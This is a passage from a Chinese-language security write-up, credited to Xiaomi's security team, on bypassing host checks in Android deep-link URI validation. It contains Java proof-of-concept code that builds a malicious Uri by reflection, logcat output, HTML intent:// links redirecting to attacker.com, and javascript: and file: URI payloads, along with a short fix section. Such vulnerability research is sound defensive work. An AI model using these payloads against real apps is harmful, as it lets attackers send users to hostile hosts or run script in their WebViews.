&nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Constructor</span> <span class="cm-variable" style="color:rgb(0,0,0);">pathPartConstructor</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">pathPartClass</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getDeclaredConstructors</span>()[<span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">0</span></span>];</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">pathPartConstructor</span>.<span class="cm-variable" style="color:rgb(0,0,0);">setAccessible</span>(<span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-literal">true</span></span>);</span><br/><span style="padding-right:.1px;"><span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Class</span> <span class="cm-variable" style="color:rgb(0,0,0);">hierarchicalUriClass</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">Class</span>.<span class="cm-variable" style="color:rgb(0,0,0);">forName</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"android.net.Uri$HierarchicalUri"</span></span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Constructor</span> <span class="cm-variable" style="color:rgb(0,0,0);">hierarchicalUriConstructor</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">hierarchicalUriClass</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getDeclaredConstructors</span>()[<span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">0</span></span>];</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">hierarchicalUriConstructor</span>.<span class="cm-variable" style="color:rgb(0,0,0);">setAccessible</span>(<span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-literal">true</span></span>);</span><br/><span style="padding-right:.1px;"><span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-built_in">Object</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">authority</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">partConstructor</span>.<span class="cm-variable" style="color:rgb(0,0,0);">newInstance</span>(<span class="cm-variable" style="color:rgb(0,0,0);">legitimateUri</span>, <span class="cm-variable" style="color:rgb(0,0,0);">legitimateUri</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-built_in">Object</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">path</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">pathPartConstructor</span>.<span class="cm-variable" style="color:rgb(0,0,0);">newInstance</span>(<span class="cm-variable" style="color:rgb(0,0,0);">attackerUri</span>, <span class="cm-variable" style="color:rgb(0,0,0);">attackerUri</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Uri</span> <span class="cm-variable" style="color:rgb(0,0,0);">uri</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> (<span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>) <span class="cm-variable" style="color:rgb(0,0,0);">hierarchicalUriConstructor</span>.<span class="cm-variable" style="color:rgb(0,0,0);">newInstance</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"https"</span></span>, <span class="cm-variable" style="color:rgb(0,0,0);">authority</span>, <span class="cm-variable" style="color:rgb(0,0,0);">path</span>, <span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-literal">null</span></span>, <span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-literal">null</span></span>);</span><br/><span style="padding-right:.1px;"><span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Log</span>.<span class="cm-variable" style="color:rgb(0,0,0);">d</span>(<span class="cm-variable" style="color:rgb(0,0,0);">TAG</span>, <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"Scheme: "</span></span> <span class="cm-operator" style="color:rgb(152,26,26);">+</span> <span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getScheme</span>());</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Log</span>.<span class="cm-variable" style="color:rgb(0,0,0);">d</span>(<span class="cm-variable" style="color:rgb(0,0,0);">TAG</span>, <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"UserInfo: "</span></span> <span class="cm-operator" style="color:rgb(152,26,26);">+</span> <span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getUserInfo</span>());</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Log</span>.<span class="cm-variable" style="color:rgb(0,0,0);">d</span>(<span class="cm-variable" style="color:rgb(0,0,0);">TAG</span>, <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"Host: "</span></span> <span class="cm-operator" style="color:rgb(152,26,26);">+</span> <span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getHost</span>());</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Log</span>.<span class="cm-variable" style="color:rgb(0,0,0);">d</span>(<span class="cm-variable" style="color:rgb(0,0,0);">TAG</span>, <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"toString(): "</span></span> <span class="cm-operator" style="color:rgb(152,26,26);">+</span> <span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">toString</span>());</span><br/><span style="padding-right:.1px;"><span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;} <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">catch</span></span> (<span class="cm-variable" style="color:rgb(0,0,0);">Exception</span> <span class="cm-variable" style="color:rgb(0,0,0);">e</span>) {</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">throw</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">new</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">RuntimeException</span>(<span class="cm-variable" style="color:rgb(0,0,0);">e</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;}</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Intent</span> <span class="cm-variable" style="color:rgb(0,0,0);">intent</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">new</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">Intent</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"android.intent.action.VIEW"</span></span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">intent</span>.<span class="cm-variable" style="color:rgb(0,0,0);">setClassName</span>(<span class="cm-variable" style="color:rgb(0,0,0);">Victim_packageName</span>, <span class="cm-variable" style="color:rgb(0,0,0);">Victim_className</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">intent</span>.<span class="cm-variable" style="color:rgb(0,0,0);">setData</span>(<span class="cm-variable" style="color:rgb(0,0,0);">uri</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">intent</span>.<span class="cm-variable" style="color:rgb(0,0,0);">addFlags</span>(<span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">268435456</span></span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">startActivity</span>(<span class="cm-variable" style="color:rgb(0,0,0);">intent</span>);</span><br/><span style="padding-right:.1px;">}</span></code></pre><p>logcat 输出：</p><pre><code class="hljs cpp"><span style="padding-right:.1px;"><span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">07</span></span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-number">-07</span></span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">19</span></span>:<span class="hljs-number">00</span>:<span class="hljs-number">36.765</span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">9209</span></span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">9209</span></span> D PoC : Scheme: https</span><br/><span style="padding-right:.1px;"><span class="cm-number" style="color:rgb(17,102,68);">07</span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-number">-07</span></span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">19</span></span>:<span class="hljs-number">00</span>:<span class="hljs-number">36.765</span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">9209</span></span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">9209</span></span> D PoC : UserInfo: null</span><br/><span style="padding-right:.1px;"><span class="cm-number" style="color:rgb(17,102,68);">07</span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-number">-07</span></span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">19</span></span>:<span class="hljs-number">00</span>:<span class="hljs-number">36.765</span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">9209</span></span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">9209</span></span> D PoC : Host: legitimate.com</span><br/><span style="padding-right:.1px;"><span class="cm-number" style="color:rgb(17,102,68);">07</span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-number">-07</span></span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">19</span></span>:<span class="hljs-number">00</span>:<span class="hljs-number">36.765</span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">9209</span></span> <span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">9209</span></span> D PoC : toString(): https:<span class="hljs-comment">//legitimate.com@attacker.com</span></span></code></pre><p>从输出日志可以看到，通过此反射方法构造的 Uri 对象，可以通过 check_v2 方法对 <code>Scheme</code>、 <code>UserInfo</code> 和 <code>Host</code> 的三项检验，但 toString() 方法的值<code>https://legitimate.com@attacker.com</code>，才是被攻击的 Activity 拉起的实际地址。如前所述，@符号之后的 &nbsp; &nbsp;<code>attacker.com</code> 便成为了最终访问的 host。</p><h3>2.4. 限制与绕过</h3><p>Android P 之后 Google 对 non-sdk 的 @hide API 进行了限制。Android Studio 也会给出如下提示，并且让这种反射调用在运行时报错失败。</p><p>Accessing internal APIs via reflection is not supported 
and may not work on all devices or in the future less… (Ctrl+F1) 
Inspection info:Using reflection to access hidden/private Android APIs 
is not safe; it will often not work on devices from other &nbsp; &nbsp; &nbsp; &nbsp;
vendors, and it may suddenly stop working (if the API is removed) or 
crash spectacularly (if the API behavior changes, since there are no 
guarantees for compatibility). Issue id: PrivateApi</p><p>截止到目前——Android Q Beta 4，还是有绕过的方法, 关于绕过原理的梳理不在本文议题范围。</p><h3>2.5. 修复方法</h3><p>抵御这种攻击的方法也非常简单，对传入的 <code>Uri</code> 对象加一次 parse() 再做 check_v2 即可。事实上，有大量的开发者因为不了解这个性质，认为传入的 url 已经是”正常“通过 <code>Uri.parse()</code> 构造的，直接信任放行。</p><h2>三、远程利用方法1</h2><p>我们知道，通过在组件中注册 <code>intent-filter</code>，App 可以响应浏览器应用或短信应用访问的外链。典型的一个配置写法如下，只有 <code><data></code> 标签中指定的内容和 Intent 中携带的 Data 完全一致时，当前活动才能响应该 Intent。</p><pre><code class="hljs xml"><span style="padding-right:.1px;"><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"><</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">activity</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">android:name</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">".DeeplinkActivity"</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">></span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"><</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">intent-filter</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">android:autoVerify</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">"true"</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">></span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"><</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">action</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">android:name</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">"android.intent.action.VIEW"</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">/></span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"><</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">category</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">android:name</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">"android.intent.category.DEFAULT"</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">/></span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"><</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">category</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">android:name</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">"android.intent.category.BROWSABLE"</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">/></span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"><</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">data</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">android:scheme</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">"https"</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">android:host</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">"legitimate.com"</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">/></span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"></</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">intent-filter</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">></span></span></span><br/><span style="padding-right:.1px;"><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"></</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">activity</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">></span></span></span></code></pre><p>前面两种方法我们都是用安装恶意 App 或 ADB 命令来触发攻击，注意到 Android 对 <code><data></code> 定义的属性，也是通过 <code>parsedIntent.getData().getHost()</code> 来进行匹配的，我们很自然的想到尝试远程利用。</p><pre><code class="hljs xml"><span style="padding-right:.1px;"><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment"><!--</span></span></span><br/><span style="padding-right:.1px;"><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment"><a href="[scheme]://[host]/[path]?[query]">调用格式</a> </span></span></span><br/><span style="padding-right:.1px;"><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">--></span></span></span><br/><span style="padding-right:.1px;"><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"><</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">a</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">href</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">"https://attacker.com\\@legitimate.com/"</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">></span></span>Click Attack v1<span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"></</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">a</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">></span></span></span><br/><span style="padding-right:.1px;"><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"><</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">a</span></span></span><span class="hljs-tag"> </span><span class="cm-attribute" style="color:rgb(0,0,204);"><span class="hljs-tag"><span class="hljs-attr">href</span></span></span><span class="hljs-tag">=</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-tag"><span class="hljs-string">"https://attacker.com%5C%5C@legitimate.com/"</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">></span></span>Click Attack v2<span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag"></</span></span><span class="cm-tag" style="color:rgb(17,119,0);"><span class="hljs-tag"><span class="hljs-name">a</span></span></span><span class="cm-tag cm-bracket" style="color:rgb(17,119,0);"><span class="hljs-tag">></span></span></span></code></pre><p>然而，对于第一个链接，浏览器会自动把反斜杠 “\” 纠正为正斜杠 “/”对于第二个链接，反斜杠 “\” 会以 URL 编码形式保留而无法触发方法1</p><p>通过仔细研究<code>intent://scheme</code>的工作机制，发现可以通过如下方式保留反斜杠 “\” 的方法：</p><p>PoC:</p><pre><a&nbsp;href="intent://not_used/#Intent;scheme=https://attacker.com\\@legitimate.com/;end">Click&nbsp;Attack&nbsp;v3</a></pre><p>跟踪源码，可以看到，访问这个链接，等价于执行：</p><pre>Uri.parse("https://attacker.com\\\\@legitimate.com/://not_used/")</pre><p>从而实现方法1的远程执行版本。</p><h2>四、缺少scheme验证</h2><p>实战不乏有些 App 对 host 做了校验，但却遗漏了对 scheme 的检查。</p><p>可以用下面的 uri， 尝试进行 js 和 file 域的 PoC：</p><pre><code class="hljs ruby"><span style="padding-right:.1px;"><span class="hljs-symbol">javascript:</span>/<span class="hljs-regexp">/legitimate.com/</span>%0aalert(<span class="hljs-number">1</span>)/<span class="hljs-regexp">/</span></span><br/><span style="padding-right:.1px;"><span><span class="hljs-regexp"></span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-regexp">file:/</span><span class="hljs-regexp">/legitimate.com/sdcard</span><span class="hljs-regexp">/payload.html</span></span></code></pre><h2>五、参考链接</h2><p>https://hackerone.com/reports/431002&nbsp;</p><p><strong style="color: rgb(159, 163, 168);">*本文作者：小米安全团队Deagle，转载来自FreeBuf</strong></p></div><p><br/></p>